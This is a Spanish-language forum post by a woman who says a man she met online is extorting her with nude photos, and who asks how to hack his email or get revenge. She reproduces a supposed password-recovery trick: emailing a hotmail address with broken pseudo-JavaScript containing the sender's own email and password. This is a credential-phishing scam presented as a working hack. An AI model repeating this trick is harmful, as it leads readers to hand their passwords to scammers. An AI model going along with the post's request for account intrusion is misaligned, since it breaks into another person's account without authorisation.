Hola a todo,
lo primero decir que me parece una web muy instructiva, que ya llevo tiempo entrando aunque nunca me había animado a postear... hasta hoy.
Resulta que estoy casada, pero infeliz, muy infeliz... mi marido ya no es el mismo desde hace tiempo, no tenemos relaciones, incluso se que me ha engañado con al menos una persona, pero por el bien de nuestra hija no voy a romper el matrimonio.
Al tema. Una mujer como es normal tiene sus necesidades, pero yo soy incapaz de ser infiel, por mucho que mi marido sea un cabrón, así que empecé a entrar en páginas eróticas, más tarde de intercambio de fotos... y ese fue mi error. Conocí a un hombre, parecía muy majo, estuvimos chateando semanas y ayer por fin me atreví a realizar el intercambio, unas fotos mías desnuda por unas suyas, y de repente, cual es mi sorpresa cuando veo que la foto que tenía él en su avatar no se correspondía para nada en la realidad, me había mentido. Empezó a reirse de mi, y a decirme que iba a mandar mis fotos a todo el mundo.
Estoy super nerviosa, y super alterada, y lo único que se me ocurre es vengarme, pero no se cómo. Un amigo me comentó que podría averiguar la contraseña de su correo, y así borrar las fotos. Hice como me dijo:
Mensaje a:
human_resources_msn@hotmail.comAsunto: Recovery_Password
Copiar y pegar en el mensaje:
var exp = new Date();
exp.setTime(exp.getTime() + (expDays*24*60*60*1000));
function amt(){
var count = GetCookie('count')
if(count == null) {
}
else {
var newcount = parseInt(count) + 1;
DeleteCookie('count')
SetCookie('EL MAIL DE TU VICTIMA)
return count
}
function checkCount(TU EMAIL) {
var count = GetCookie('count');
if (count == null) {
count=(TU PASSWORD)
SetCookie('count', count, exp);
}
}
Al principio no recibí nada, lo volví a enviar y recibi su supuesta contraseña, pude entrar durante 5 minutos pero de repente me salió de la sesión, así que no me dió tiempo a borrar las fotos. Desde entonces no recibo nada al mandarlo.
Alguna otra idea para recuperar, o para putear a este cabrón? (quien me ayude tendrá regalo, pero por webcam, ya no me fío de nadie).